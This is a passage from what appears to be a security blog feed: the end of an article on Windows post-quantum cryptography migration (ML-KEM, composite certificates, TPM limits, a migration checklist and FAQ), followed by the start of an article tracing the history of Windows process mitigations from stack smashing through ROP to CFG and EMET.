NIST IR 8547 proposes the timeline; CNSA 2.0 imposes it on U.S. National Security Systems; CA/Browser Forum will eventually impose it on public web PKI. The unfunded part is the operational work. Every organisation operating an internal Windows AD CS hierarchy has to re-issue its root, its issuing CAs, and every end-entity certificate. The Microsoft tooling for this rebuild is the AD CS composite-signature support and the CertEnroll ML-DSA template path. The CA throughput question is real -- a typical commercial CA issues at peak in the low hundreds of thousands of certificates per day, and the global web PKI runs at orders of magnitude more -- which is why composite signatures are the deployment story for 2026-2030 and pure-PQ X.509 is the post-2030 story [@nist-ir-8547, @draft-lamps-composite]. flowchart TD OP1["TPM / Pluton blob-size limits (v1.85)"] OP2["Kerberos PKINIT bootstrap"] OP3["Authenticode and EFI dbx"] OP4["CNG algorithm agility"] OP5["Global PKI rebuild by 2035"] OP1 --> S1["Hello attestation"] OP1 --> S2["BitLocker network unlock"] OP1 --> S3["Trustlet attestation"] OP2 --> S4["Domain join"] OP2 --> S5["Smart-card logon"] OP2 --> S6["Kerberos-mediated SMB / RDP / IIS"] OP3 --> S7["Driver loading"] OP3 --> S8["Secure Boot revocation"] OP4 --> S9["Schannel / AD CS / IKEv2 / SMB / RDP"] OP5 --> S10["Every X.509 certificate in the estate"]

Note: ML-DSA-87 keys cannot live on a TPM 2.0 chip whose firmware predates Library Specification v1.85. Three Windows surfaces are stuck on RSA-2048 / ECDSA-P256 until v1.85-capable chips reach retail volume: Windows Hello attestation (TPM-bound), BitLocker network unlock (depends on TPM key sealing), and Trustlet attestation (LSAISO / Credential Guard). Pluton can move faster than discrete TPMs because its firmware ships through Windows Update; the cross-reference to the Pluton sibling article explains the firmware-update agility mechanism [@wolfssl-wolftpm-v185, @ms-quantum-safe-blog].

Five open problems, five decade-scale research programmes, five places where a Windows engineer's procurement decision in 2026 will be visible in 2035. So what does that engineer do on Monday morning?

10. Practical Guide -- What an Engineer Does Monday Morning

Six actions, in priority order. Each is doable in May 2026. Each closes a real gap. None requires a procurement cycle -- those start at Action 4.

Note: Run a CNG inventory against HKLM\SYSTEM\CurrentControlSet\Control\Cryptography and the registered providers. Catalogue certificate templates with certutil -template. Enumerate Schannel cipher suites with Get-TlsCipherSuite on every Schannel-using service. Identify every place RSA-2048, ECDSA-P256, ECDH/X25519, RSA-PSS, and DSA appear in your estate. Output is a CSV. The CSV is the input to every subsequent action. Without inventory, the migration is a guessing game [@cng-algorithm-ids].

{` // Pseudo-code for a Schannel cipher-suite inventory. // In real PowerShell: Get-TlsCipherSuite | Select-Object Name, Hash, Cipher, Exchange // This logic flags quantum-vulnerable Exchange groups (RSA, ECDH-*-without-PQ-companion). type CipherSuite = { name: string; exchange: string; // "ECDHE", "DHE", "RSA", "X25519MLKEM768", ... cipher: string; // "AES-256-GCM", "ChaCha20-Poly1305", ... hash: string; // "SHA-384", "SHA-256", ... };

const QUANTUM_VULNERABLE_EXCHANGE = new Set([ "RSA", "DHE", "ECDHE", "ECDH", // classical key agreement "X25519", "SecP256r1", "SecP384r1", // unwrapped classical EC groups ]);

const QUANTUM_SAFE_EXCHANGE = new Set([ "X25519MLKEM768", "SecP256r1MLKEM768", "SecP384r1MLKEM1024", "MLKEM768", "MLKEM1024", ]);

Note: Cloudflare-fronted endpoints already negotiate X25519MLKEM768 by default [@cloudflare-pq-for-all, @cloudflare-pq-2024]. For Windows servers using OpenSSL 3.5+, enable hybrid. For Schannel-only servers, monitor the Group Policy toggle on 24H2 and the documented Schannel curve preference order. Hybrid is the immediate harvest-now-decrypt-later defence -- the one place where a single configuration change measurably reduces today's exposure to a future quantum break.

Note: Issue one composite root, one composite issuing CA, one composite end-entity certificate in a non-production lab. Validate consumption by an updated Schannel client and Microsoft Edge. The point is to surface the operational rough edges -- template definition, key-archival behaviour with PQ keys, certificate-validation timing on uplevel and downlevel clients -- before they hit production. This is the load-bearing 2026-2030 PKI migration on-ramp; the composite OID is downlevel-compatible, so the failure mode of an uplevel client validating an unaltered classical chain is the baseline, not a regression [@draft-lamps-composite].

Note: Current TPM 2.0 v1.84 chips on most Windows 11 endpoints will not accept ML-DSA-87 keys without a firmware update. Use Get-Tpm and the TBS API to enumerate supported algorithms; if BCryptOpenAlgorithmProvider for ML-DSA returns NTE_NOT_SUPPORTED against the platform crypto provider, the underlying TPM does not yet expose the PQ surface. If your hardware lifetime extends past 2030, wait for v1.85-capable chips (early sampling 2026) or Pluton (already shipping with on-die firmware updates). Inventory your fleet's TPM firmware versions today; the migration plan needs to know the floor [@wolfssl-wolftpm-v185].

Note: UEFI capsule signing, OEM driver signing, and secure-boot dbx revocation entries are all candidates for LMS or XMSS [@cnsa20-csa]. The stateful-counter requirement is acceptable because build pipelines already track build numbers monotonically. The CNG identifier BCRYPT_LMS_ALGORITHM is prerelease; SymCrypt v103.6.0 ships LMS [@symcrypt-changelog]. Start the pilot in a non-production signing service that has secure HSM custody of the counter state. The firmware-signing migration is the only place where CNSA 2.0 explicitly prefers stateful hash-based signatures over ML-DSA, because firmware signing is the use case where state discipline is realistic.

Note: Post-quantum Authenticode is not specified by Microsoft as of May 2026. Premature migration breaks downlevel verification. The discipline is: hybrid TLS first, composite X.509 chain second, AD CS pilot third, firmware-signing pilot fourth, and leave Authenticode alone until Microsoft publishes the post-quantum Authenticode specification. Authenticode signatures are validated at binary load time; harvest-now-decrypt-later does not apply, and there is no urgency that justifies risking downlevel-verifier breakage. This is the action that takes restraint rather than effort.

The priority ordering follows the threat model. Hybrid TLS is first because it closes harvest-now-decrypt-later on transport traffic with no compatibility cost (the classical share remains in the handshake; an uplevel server downgrades to classical-only cleanly). Composite X.509 is second because it lets you build a post-quantum-ready PKI hierarchy now and surfaces operational rough edges before pure-PQ deployments. Firmware signing is third because the stateful-counter discipline requires HSM-mediated key custody and a long lead time for the signing pipeline. Authenticode is last because there is no specification and no urgency.

One quarter to inventory, two quarters to pilot, two years to volume. Now for the questions every engineer asks after reading.

11. Frequently Asked Questions and Closing

Yes, when the server supports `X25519MLKEM768` and your Edge build negotiates it. Check via the Edge devtools' Security panel, or test against a Cloudflare-fronted endpoint with the Edge URL bar's connection information popup. Cloudflare reported nearly two percent of all TLS 1.3 connections to its edge were post-quantum-protected in March 2024, with a forecast of double-digit adoption by year-end [@cloudflare-pq-2024]. Endpoints that have not enabled hybrid TLS still negotiate X25519 alone, which leaves you exposed to harvest-now-decrypt-later. Not as of May 2026. Schannel's hybrid TLS 1.3 preview is gated behind Group Policy on 24H2 and Server 2025. Microsoft's Quantum-Safe Security blog frames May 2026 to November 2026 as the milestone window for default-on negotiation [@ms-quantum-safe-blog]. Until then, the Schannel side has to be explicitly opted in via the cipher-preference order and the Group Policy toggle. No, not on the public record. Post-quantum Authenticode is not yet specified. The CNG `BCRYPT_MLDSA_ALGORITHM` exists, and SymCrypt 103.7.0 implements ML-DSA, but the Authenticode signature format and the verifier policy have not been updated to accept post-quantum algorithms. Premature migration breaks downlevel verification on every Windows machine that has not received the PQ Authenticode update -- which today is *every* Windows machine. Do not migrate Authenticode prematurely. Only against harvest-now-decrypt-later. Today's TLS is not under quantum attack -- quantum computers capable of breaking RSA-2048 or ECDH-X25519 do not exist in 2026. But today's TLS *traffic can be recorded* today, and if a sufficient quantum computer exists in 2040 the recorded traffic can be decrypted then. Enabling hybrid TLS now closes that window; enabling it in 2035 does not retroactively protect the traffic recorded in 2026 [@mosca-2015]. Nobody knows. CNSA 2.0 picks 2035 as the policy deadline, not a technical forecast [@cnsa20-csa]. Mosca's 2015 estimate, widely reproduced in PQC literature, was a 1/2 chance of breaking RSA-2048 by 2031. Quantum-engineering progress between 2015 and 2026 has been substantial on the qubit-count axis and modest on the error-correction axis; the underlying question -- when a thousand-logical-qubit fault-tolerant device becomes available -- has no consensus answer in 2026. CNSA 2.0's job is to make the answer not matter. Hybrid `X25519MLKEM768` protects you against a break of either component. The HKDF combiner in `draft-ietf-tls-hybrid-design-16` requires both component shared secrets to be uniform-looking from the adversary's perspective; an attacker who breaks only ML-KEM still cannot recover the session key without also breaking X25519 [@draft-tls-hybrid]. Pure ML-KEM (no hybrid) does not have this property. The central design choice of the IETF hybrid construction is that it pays the byte cost (~1.2 KB extra per handshake) to buy the safety margin. The kilobyte scale is structural to lattice mathematics; it is not a parameter-tuning issue. The minimum key size for a Module-LWE-based KEM at NIST category 3 is set by the dimension required for security under the best known lattice-sieving attacks. ML-KEM-768 at 1184 bytes is already aggressively tuned [@wp-kyber]. The alternatives that offer smaller keys (Falcon at 897 bytes, SIKE-when-it-was-alive at ~330 bytes) buy that size with either constant-time difficulty (Falcon's Gaussian sampler) or fragility (SIKE collapsed in July 2022). Classical comparisons: X25519's 32-byte public value is the floor; Classic McEliece's ~1 MB is the ceiling. Only if your procurement timeline extends past 2030. As of May 2026, TPM 2.0 v1.85-PQ-spec-compliant chips are in announcement and early-sampling stages, not in retail volume [@wolfssl-wolftpm-v185]. Pluton is shipping, but is locked to specific SoC generations (current Intel Core Ultra series, AMD Ryzen 8000-series, Qualcomm Snapdragon X) [@pluton-microsoft-learn]. If you replace endpoints every three years, your 2026 procurement decision will be visible in 2029, before any post-quantum TPM mandate bites. If your refresh cycle is five-to-seven years, the calculus changes -- but the answer is still "wait for v1.85 silicon to ship at volume" unless you can write a specific business case for the early-adopter risk.

Closing

A Windows endpoint opens a connection to cloudflare.com. The 1184-byte field on the wire is no longer a curiosity. It is a thirty-year migration in a single TLS extension. The bytes have a history: Diffie and Hellman in 1976; Shor in 1994; McEliece's megabyte keys; HFE and its descendants broken by Beullens; NTRU patented for two decades; Regev's quantum-reduction LWE in 2005; the Ring-LWE compression of 2010; the Module-LWE knob of 2012; BCNS 2014 from Microsoft Research Redmond; Cloudflare-by-default on October 3, 2022; the Castryck-Decru break twenty-five days after NIST's July 2022 selection; SymCrypt 103.5.0; the FIPS publications of August 13, 2024; the CNG BCRYPT_MLKEM_ALG_HANDLE exposed in Insider Canary in May 2025; Schannel preview behind Group Policy in early 2026.

The work is not done. Kerberos PKINIT has no PQ path. Authenticode has no PQ specification. BitLocker network unlock is still RSA-2048. The EFI signature database is still RSA-2048. Every signed binary already on every Windows disk in the world is signed with an algorithm whose 2035 status is uncertain. The TPM 4096-byte buffer cannot fit an ML-DSA-87 signature. CNG ships per-algorithm identifiers, not per-algorithm-class, which guarantees that the next migration will hit the same surfaces from the same angle. CNSA 2.0 picks 2035; NIST IR 8547 picks 2035 [@cnsa20-csa, @nist-ir-8547]; the global public-CA infrastructure has nine years to rebuild every certificate it has ever issued.

Migration to post quantum cryptography (PQC) is not a flip-the-switch moment, it's a multiyear transformation that requires immediate planning and coordinated execution to avoid a last-minute scramble. -- Microsoft Quantum-Safe Security blog, 20 August 2025 [@ms-quantum-safe-blog]. The cryptographic transition described here runs in parallel to the architectural transition documented across this blog's sibling articles. The hypervisor article explains the substrate on which the Secure Kernel and trustlets sit. The VBS trustlets article explains where Credential Guard lives. The NTLM-to-Kerberos article documents the protocol migration that PQ Kerberos PKINIT will eventually re-do. The Adminless article addresses the local-administrator surface; the Pluton and TPM articles cover the silicon-side roots of trust; the Secure Boot article covers the static measured boot chain that meets the dynamic measured boot chain at hypervisor load. Read them in any order. They share the same migration calendar, the same engineering discipline, and the same honesty about the gaps.

Above all, the bytes are real. The CNG handle exists. The SymCrypt release is shipping. The migration has started. The next decade is the engineering. Every line of code, every parameter set, every byte of that 1184-byte field has thirty years of work behind it, and the Windows engineer of 2026 is the one who carries it the next mile.

<StudyGuide slug="post-quantum-cryptography-on-windows" keyTerms={[ { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice-Based Key-Encapsulation Mechanism. The only NIST-finalised post-quantum KEM. Parameter sets ML-KEM-512/768/1024 over R_q = Z_q[X]/(X^256 + 1) with q = 3329. ML-KEM-768 public key is 1184 bytes, ciphertext 1088 bytes, shared secret 32 bytes." }, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice-Based Digital Signature Algorithm. Fiat-Shamir-with-aborts over Module-LWE / Module-SIS, q = 8380417. Parameter sets ML-DSA-44/65/87; signatures 2420 / 3293 / 4595 bytes." }, { term: "SLH-DSA (FIPS 205)", definition: "Stateless Hash-Based Digital Signature Algorithm. SPHINCS+ lineage; security rests on hash-function security alone. Twelve parameter sets across SHA-2 and SHAKE; signatures 7,856 to 49,856 bytes." }, { term: "LWE / Ring-LWE / Module-LWE", definition: "Learning With Errors: distinguish (A, As + e) from uniform when e is small. Ring-LWE lifts to a polynomial ring; Module-LWE generalises to module-rank-k. The 2010-2012 algebraic lift compressed lattice key sizes from megabytes to kilobytes." }, { term: "NTT", definition: "Number Theoretic Transform. The finite-field analogue of the FFT; reduces polynomial multiplication in R_q from O(n^2) to O(n log n). The reason ML-KEM is fast enough for TLS." }, { term: "Fujisaki-Okamoto-Hofheinz transform", definition: "Generic IND-CPA-to-IND-CCA2 transform for KEMs. Re-encrypts the plaintext during decapsulation and returns implicit-rejection pseudorandom output on mismatch. ML-KEM wraps K-PKE with FO to become IND-CCA2." }, { term: "Mosca's inequality", definition: "X + Y > Z. If data-secrecy lifetime plus migration time exceeds time-to-quantum-computer, harvest-now-decrypt-later succeeds. The framing that made post-quantum migration an actionable IT-policy lever." }, { term: "CNSA 2.0", definition: "U.S. NSA Commercial National Security Algorithm Suite 2.0. Mandates ML-KEM-1024, ML-DSA-87, LMS/XMSS for firmware, AES-256, and SHA-384 in National Security Systems. Acquisition preference 2027; mandatory adoption 2031; RSA / ECDSA disallowed after 2035." }, { term: "Hybrid key agreement", definition: "Combines a classical key-agreement primitive (X25519) with a post-quantum KEM (ML-KEM-768) so the session key depends on both. An adversary must break both components to forge or recover. Used by Cloudflare since October 2022, Apple iMessage PQ3 since February 2024, Schannel preview in 2026." }, { term: "Composite signature", definition: "X.509 signature that combines a classical and a post-quantum component such that both must verify. The deployment story for 2026-2030 X.509 PKI migration, per draft-ietf-lamps-pq-composite-sigs-19. Downlevel verifiers ignore the composite OID; uplevel verifiers validate both." }, { term: "Algorithm agility", definition: "The property that protocols and APIs can change the underlying algorithm without re-engineering the consumer. CNG ships per-algorithm identifiers (BCRYPT_MLKEM_ALGORITHM) rather than per-algorithm-class identifiers; a future Round-5 KEM will require new CNG plumbing." }, { term: "X25519MLKEM768", definition: "Hybrid TLS 1.3 Supported Group, codepoint 0x11EC, defined in draft-ietf-tls-ecdhe-mlkem-04. Concatenates X25519 (32-byte) and ML-KEM-768 (1184-byte ek / 1088-byte ct) shares. ClientHello key_share is 1216 bytes; ServerHello key_share is 1120 bytes." } ]} questions={[ { q: "Why is the post-quantum programme a public-key replacement programme and not a symmetric one?", a: "Shor's algorithm breaks RSA / DH / ECDSA / ECDH in polynomial time on a fault-tolerant quantum computer, with no parameter increase rescuing them. Grover's algorithm gives only a quadratic speedup on symmetric primitives, which is absorbed by doubling key sizes (AES-256, SHA-384). The asymmetric lane is fatal; the symmetric lane is a parameter bump." }, { q: "What single algebraic move compressed lattice public keys from megabytes to kilobytes?", a: "Lifting Learning With Errors from Z_q to a polynomial ring R_q = Z_q[X]/(X^n + 1), per Lyubashevsky-Peikert-Regev 2010. Polynomial multiplication via NTT becomes O(n log n) instead of O(n^2). Module-LWE (Langlois-Stehle 2012/2015) added a module-rank parameter knob that lets one base ring serve every NIST security category." }, { q: "Why does the NIST FIPS slate combine a lattice scheme and a hash scheme rather than two lattice schemes?", a: "Diversification. Both the Rainbow break (Beullens, February 2022) and the SIKE break (Castryck-Decru, July 2022) happened during the NIST competition. The portfolio rests on two structurally unrelated foundations (lattice + hash) so that a single mathematical break cannot retire the whole programme. SLH-DSA's security rests on hash-function security alone." }, { q: "Which SymCrypt version first added ML-KEM?", a: "Version 103.5.0, which 'Add ML-KEM per final FIPS 203' along with XMSS and XMSS^MT. Subsequent versions added LMS (103.6.0), ML-DSA (103.7.0), the FIPS approved-services indicator (103.8.0), ML-DSA External-Mu (103.9.0), FIPS CAST for ML-DSA (103.9.1), and Composite ML-KEM (103.11.0)." }, { q: "What TLS Supported Group does Schannel preview-negotiate on 24H2, and what is its codepoint?", a: "X25519MLKEM768, codepoint 0x11EC, per draft-ietf-tls-ecdhe-mlkem-04 (8 February 2026). The ClientHello carries 32 bytes X25519 + 1184 bytes ML-KEM-768 encapsulation key (1216 bytes total); the ServerHello carries 32 bytes X25519 + 1088 bytes ML-KEM-768 ciphertext (1120 bytes total)." }, { q: "Why does ML-DSA-87 not fit on a commodity TPM 2.0 chip?", a: "ML-DSA-87 signatures are 4595 bytes. Default TPM 2.0 MAX_COMMAND_SIZE and MAX_RESPONSE_SIZE are 4096 bytes. TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming TPM2_SignSequence Start / Complete family (with TPM2_SignDigest / TPM2_VerifyDigestSignature for digest-mode operations) and ML-KEM TPM2_Encapsulate / Decapsulate, but v1.85-capable chips are in early sampling in 2026, not retail volume." }, { q: "What is the difference between LMS / XMSS and SLH-DSA, and when does CNSA 2.0 prefer each?", a: "LMS and XMSS are stateful: the signer must track a counter and never reuse a leaf index. SLH-DSA derives the leaf address from the message hash and per-signature randomness, making it stateless. CNSA 2.0 specifies LMS or XMSS for firmware signing (where build pipelines already track counters under HSM custody) and ML-DSA-87 for general signing." }, { q: "Why does PQC not close the signed-binary persistence channel?", a: "Authenticode signatures are validated at binary load time. A 2026 RSA-2048 signature has already been verified by every machine that downloaded the binary; a 2035 quantum break does not retroactively decrypt anything because Authenticode is not an encryption channel. The threat model is forgery of new signatures on new binaries, not retroactive decryption. Harvest-now-decrypt-later does not apply." } ]} />

Process Mitigation Policies: CFG, ACG, CIG, and the Layer Between App Identity and the Kernel

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Windows ships every modern memory-corruption mitigation as a per-process flag rather than a system-wide setting -- because Outlook can't enable CIG, Defender can't enable ACG, and Notepad doesn't need Disable-Win32k. `SetProcessMitigationPolicy` exposes twenty of these knobs (plus a `MaxProcessMitigationPolicy` sentinel that terminates the enum); the canonical six (DEP, ASLR, CFG, CET shadow stack, ACG, CIG) constrain the control-flow primitives, and the other fourteen cover adjacent attack surfaces. Each knob is a tombstone for an exploit primitive that worked in the previous generation. This article walks the thirty-year arc that built that surface, then names the residual attacks that survive even a fully-stacked process.

1. The bug is still there. Why didn't the exploit work?

A vulnerability researcher has just landed a type-confusion bug in a JavaScript engine inside an Edge content process. The primitive is exactly what they expected: a writable heap address holding a corrupted vtable pointer. From that pointer the renderer will, on its very next virtual-method call, jump into an address the attacker chose.

That is supposed to be game over. It is, in the language of every exploit-development textbook from 1996 onward, a working write-what-where. The CPU loads the corrupted pointer into a register. It dereferences it. It calls.

And the process dies.

There is no shell. There is no remote code execution. There is a Windows Error Reporting dialog and a STATUS_STACK_BUFFER_OVERRUN (also written FAST_FAIL_GUARD_ICALL_CHECK_FAILURE) in the crash log, raised from a thunk named ntdll!LdrpValidateUserCallTarget the researcher has never seen in their disassembler before. The bug fired exactly as the recipe said. The exploit chain didn't.

What stopped it?

Note: Every per-process mitigation in SetProcessMitigationPolicy is a tombstone for an exploit primitive that worked in the previous generation. The list of policies is, read top to bottom, an attacker's autobiography [@ms-setprocessmitigationpolicy].

A per-process, opt-in security policy installed via the Win32 `SetProcessMitigationPolicy` API (or, more safely, via `UpdateProcThreadAttribute` before a child process executes its first user-mode instruction). The `PROCESS_MITIGATION_POLICY` enum lists twenty-one values -- twenty actual policies plus the `MaxProcessMitigationPolicy` sentinel that terminates the enum -- as of Windows 11 24H2, each one a separate axis on which an exploit can fail [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

The fastest way to see this is to compare two PowerShell sessions. Pick a maximally-hardened process, the Edge content process, and run Get-ProcessMitigation -Name msedge.exe. Six mitigations show as ON: CFG, CET shadow stack, ACG, CIG, Disable-Win32k, and Disable-Extension-Points. Now do the same for Notepad.exe. One or two show as ON. Notepad is a different kind of process -- it is not parsing attacker-controlled bytes from the public internet, so the mitigation surface it carries is correspondingly small.

The mitigation set is not just an enable-everything list. Several of the policies are mutually expensive (CET costs cycles on every call/ret; ACG forbids any in-process JIT; CIG forbids any third-party plugin); turning them all on is only viable for a process whose owner accepts those costs. The PowerShell Set-ProcessMitigation and Get-ProcessMitigation cmdlets ship in the ProcessMitigations module that succeeded EMET in 2018.

Edge carries six mitigations because it has six structurally separate ways the attacker can win. CFG addresses the indirect-call hijack. CET addresses the return-address hijack. ACG addresses the "redirect the JIT to emit my shellcode" hijack. CIG addresses the "plant a Microsoft-signed DLL where the loader picks it up" hijack. Disable-Win32k addresses the renderer-to-kernel escape. Disable-Extension-Points addresses the AppInit_DLLs-class injection.

Each one is the closing footnote on a different generation of offensive research. CFG closes indirect-call hijacking. CET closes the shadow-stack-less era. ACG closes JIT spray. CIG closes signed-DLL planting. Get-ProcessMitigation lays them out as a flat list of ON checkmarks, as if they had always been there -- as if they had not each cost a decade of research to design and ship.

So the chain failed. But which mitigation caught the indirect-call hijack we started with -- and why was that one on? Where do these mitigations come from, and how did Windows arrive at this exact set? To answer that, we have to go back three decades.

2. How attackers stopped being able to put bytes on the stack and run them

The story starts in November 1996. Phrack magazine, issue forty-nine, file fourteen of sixteen. Aleph One -- the handle of Elias Levy, a security columnist who would later moderate the BugTraq mailing list -- publishes Smashing The Stack For Fun And Profit [@phrack-49-14]. The article is a recipe. It walks the reader through process memory layout on Unix, the structure of the call stack on x86, the mechanics of overwriting the saved return address, the construction of /bin/sh shellcode, and the use of NOP sleds. By the end the reader has working exploit code against syslog, splitvt, sendmail 8.7.5, and Linux/FreeBSD mount.

Buffer overflows existed before Aleph One. The 1988 Morris Worm used one in fingerd; Mudge's 1995 How to Write Buffer Overflows L0pht paper had pieces of the technique. But it was an oral tradition -- something you learned at DEFCON or from someone who learned it at DEFCON. Aleph One's contribution was pedagogical: a step-by-step recipe anyone with a debugger and an afternoon could follow. Once that recipe was published, every memory-safety bug in C and C++ -- and there were many -- became a candidate for shell-as-the-vendor.

The defensive response came fast, and it came with a brutal honesty that has shaped every later mitigation. In August 1997, Alexander Peslyak, writing under the handle Solar Designer and running the Openwall Project, posted to BugTraq [@solar-designer-bugtraq-1997]. He had two things. The first was a Linux kernel patch -- still documented at the Openwall README to this day -- that made user-mode stack pages non-executable in software, since AMD's hardware NX bit was six years away [@openwall-readme]. The second was a working return-into-libc exploit against lpr, which redirected execution into system() in the C library rather than into stack-resident shellcode.Solar Designer was honest enough to publish the bypass on the same day as the patch. This is a defender-publishes-own-bypass precedent that has governed almost every Microsoft mitigation announcement since: ship the mitigation, name the residual attack class, set the expectation that the mitigation is a speed bump rather than a fix.

A memory protection invariant -- "write XOR execute" -- requiring that any page in the process address space be either writable or executable, but never both at the same time. PaX shipped the first complete implementation of W^X on Linux in 2000; AMD's NX bit in 2003 moved it from software emulation to hardware enforcement; the per-process ACG policy in Windows generalises W^X to apply for the lifetime of an entire process, with no per-thread escape hatch.

The next move was structural. In September 2000 the pseudonymous PaX Team released PAGEEXEC, the Linux non-executable-page implementation that made every writable page non-executable (not just the stack), using clever x86 segment-limit and split-TLB tricks [@wiki-pax]. PaX is also where the term "ASLR" comes from. The July 2001 PaX patch series randomized the executable base, the stack, the heap, the mmap'd library region, and (with RANDEXEC) even the position of the executable's code segment. The PaX design document for ASLR is unusually rigorous about probability -- it derives the expected number of brute-force attempts as a function of entropy bits, decades before anyone framed it that way in the academic literature.

Address Space Layout Randomization. Per-boot or per-load randomization of the locations at which the kernel maps modules, the stack, the heap, and `mmap`'d regions into a process's virtual address space. On x86-32 Windows Vista, modules had one of 256 possible base addresses (about 8 bits of entropy). On x64 with `/HIGHENTROPYVA`, entropy is much higher because the virtual address space is larger. ASLR is the precondition that makes every later forward-edge CFI scheme worth deploying -- without it, the attacker just hardcodes the call target.

Hardware finally caught up on September 23, 2003. AMD shipped the no-execute bit -- "NX bit," bit 63 of the 64-bit long-mode page-table entry -- with the Athlon 64 launch [@wiki-nx-bit]. Intel followed with the marketing-renamed "XD bit" in later Pentium 4 Prescott silicon. From 2003 onward, marking a page non-executable was a single PTE flag away.

Microsoft consumed the hardware almost immediately. Windows XP Service Pack 2, RTM August 6, 2004, shipped Data Execution Prevention as a system-wide feature. DEP defaulted to OptIn but supported four system-level modes (OptIn, OptOut, AlwaysOn, AlwaysOff) and exposed a per-binary opt-in via the /NXCOMPAT PE-header flag. On hardware without NX, DEP fell back to a software emulation limited to system-supplied binaries.

The Wikipedia ROP article frames this moment exactly: "Microsoft Windows provided no buffer-overrun protections until 2004" [@wiki-rop]. After XP SP2, Windows joined PaX, OpenBSD, and Solar Designer's Openwall on the W^X side of the line.

Three years later, in January 2007, Microsoft shipped Vista. Vista randomized DLL and EXE module bases at boot, with 256 possible load locations per module on x86. Michael Howard's MSDN design blog from May 2006 gives a worked example showing wsock32.dll at 0x73ad0000 on one boot and 0x73200000 on the next [@ms-howard-vista-aslr]. Vista paired ASLR with /GS stack canaries, /SafeSEH validated SEH chains, DEP, and pointer obfuscation -- the first Microsoft OS to ship a layered exploit-mitigation stack as policy.

flowchart LR A[1996 Nov
Aleph One
Phrack 49 14] --> B[1997 Aug
Solar Designer
non-exec stack
+ return-into-libc] B --> C[2000 Sep
PaX Team
PAGEEXEC] C --> D[2001 Jul
PaX
first ASLR] D --> E[2003 Sep
AMD NX bit
Athlon 64] E --> F[2004 Aug
Microsoft DEP
Windows XP SP2] F --> G[2006 May
Microsoft
Vista ASLR design] G --> H[2007 Jan
Vista GA
layered mitigation]

DEP and ASLR are not per-process mitigations in the modern sense. They are the system-wide foundation that the per-process surface sits on top of. The reason ProcessDEPPolicy still exists in the modern enum at all is to give 32-bit processes a way to enforce DEP locally even when the system policy is permissive. On x64, DEP is unconditionally on; the per-process knob is a vestigial 32-bit-only flag. ProcessASLRPolicy is more useful -- it allows a process to force-on high-entropy bottom-up randomization with ForceRelocateImages -- but it too is a refinement of a system-wide foundation, not a new defensive primitive [@ms-setprocessmitigationpolicy].

By 2007, the story should have been over. DEP had made shellcode unrunnable. ASLR had made gadget addresses unpredictable. Every attacker primitive Aleph One named in 1996 was, in principle, defended. It was not.

Because the attacker did not need to write new bytes. They could reuse the bytes that were already there.

3. ASLR plus DEP made shellcode hard, so attackers stopped writing shellcode

October 2007. Hovav Shacham, then on the UC San Diego computer-science faculty after a postdoctoral fellowship at the Weizmann Institute, presents The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) at ACM CCS [@shacham-rop-pdf]. The paper's existence claim is simple and devastating: in any sufficiently large C library, the set of short instruction sequences ending in ret is Turing-complete. The attacker does not need to inject any new code. They only need to write data -- a sequence of return addresses on the stack -- and the CPU obediently executes already-mapped, already-executable libc bytes in the attacker's chosen order.

The mechanism is small enough to explain in a paragraph. Shacham named the technique return-oriented programming. The attacker arranges for the program to return into a gadget -- a short sequence of one to four instructions ending in ret. The gadget is selected from existing executable memory: libc, ntdll, the program's own code segment. The instructions perform a useful primitive (load a register, do arithmetic, dereference a pointer). The trailing ret pops the next stack slot, which the attacker has populated with the address of the next gadget. The stack is now the program counter; the CPU is now a Turing-complete machine for whatever language the gadget catalog implements.

An exploitation technique in which the attacker chains short, existing instruction sequences ("gadgets") each ending in `ret`. Control transfers happen via the program's own return instructions, executing already-mapped, already-executable code. ROP defeats W^X (DEP, NX) because the attacker injects no new code; it weakens against ASLR but does not break under it because info-leak primitives recover the gadget base address. Coined by Hovav Shacham in 2007 [@shacham-rop-pdf].

The follow-up Black Hat USA 2008 talk generalised the result to RISC architectures [@shacham-bhusa-2008], killing "x86's variable-length instructions are why ROP works" as a defensive direction. ROP works on ARM. ROP works on MIPS. ROP works wherever an attacker can predict the address of executable bytes and control the stack.

Return-oriented programming allows an attacker to execute code in the presence of security defenses such as executable space protection. -- Wikipedia, *Return-oriented programming*, lead paragraph [@wiki-rop]

After 2007, the structural agenda of every defensive engineering team on Windows changes. The question is no longer "can we stop the attacker from writing bytes into executable pages?" -- DEP solved that, and ROP routed around it. The question is now: "which control transfers is the attacker allowed to cause?"

Shacham's UCSD lab (later UT Austin) kept exploring the boundary between code-reuse attacks and provable software defenses. The 2007 paper is the field-shaping one; the 2008 BHUSA generalisation to RISC was the closing argument.

Key idea: After Shacham 2007, every defensive engineering decision in Windows mitigation has been about which control-flow transfers the attacker is allowed to cause, not about what bytes the attacker can write. This is the article's load-bearing axis. CFG, XFG, CET, ACG, CIG, and every smaller mitigation in PROCESS_MITIGATION_POLICY follows from this one shift.

Microsoft's first response was behavioral, not structural. In 2009 the company released the Enhanced Mitigation Experience Toolkit (EMET), a free shim DLL that injected runtime checks into existing user-mode processes to detect ROP-shaped behavior. EMET checked for stack pivots, for unaligned ret-targets, for known-malicious gadget sequences, for unusual SEH chain layouts. It worked, intermittently, for a while. Then attackers adjusted, gadget-replacing around EMET's heuristics, and Microsoft slowly conceded the behavioral-detection direction was a dead end. EMET's final release was 5.52 in November 2016; end of life was July 31, 2018 [@wiki-emet]. Microsoft's stated successors are the ProcessMitigations PowerShell module and Windows Defender Exploit Guard -- i.e., the formal SetProcessMitigationPolicy surface this article catalogs [@wiki-emet].

EMET was an honorable failure. It taught the security industry that you cannot detect a control-flow hijack by looking at its symptoms; you can only prevent it by enforcing an invariant on the control flow itself. That lesson is exactly what Control Flow Guard (CFG) and Control-Flow Enforcement Technology (CET) embody. Every behavioral-ROP-detection product since EMET (Carbon Black's BB exploit protection, Symantec's Heat Shield, vendor-specific EDR ROP checks) has had the same fate against motivated adversaries -- you can buy time but you cannot fix the problem in heuristics.

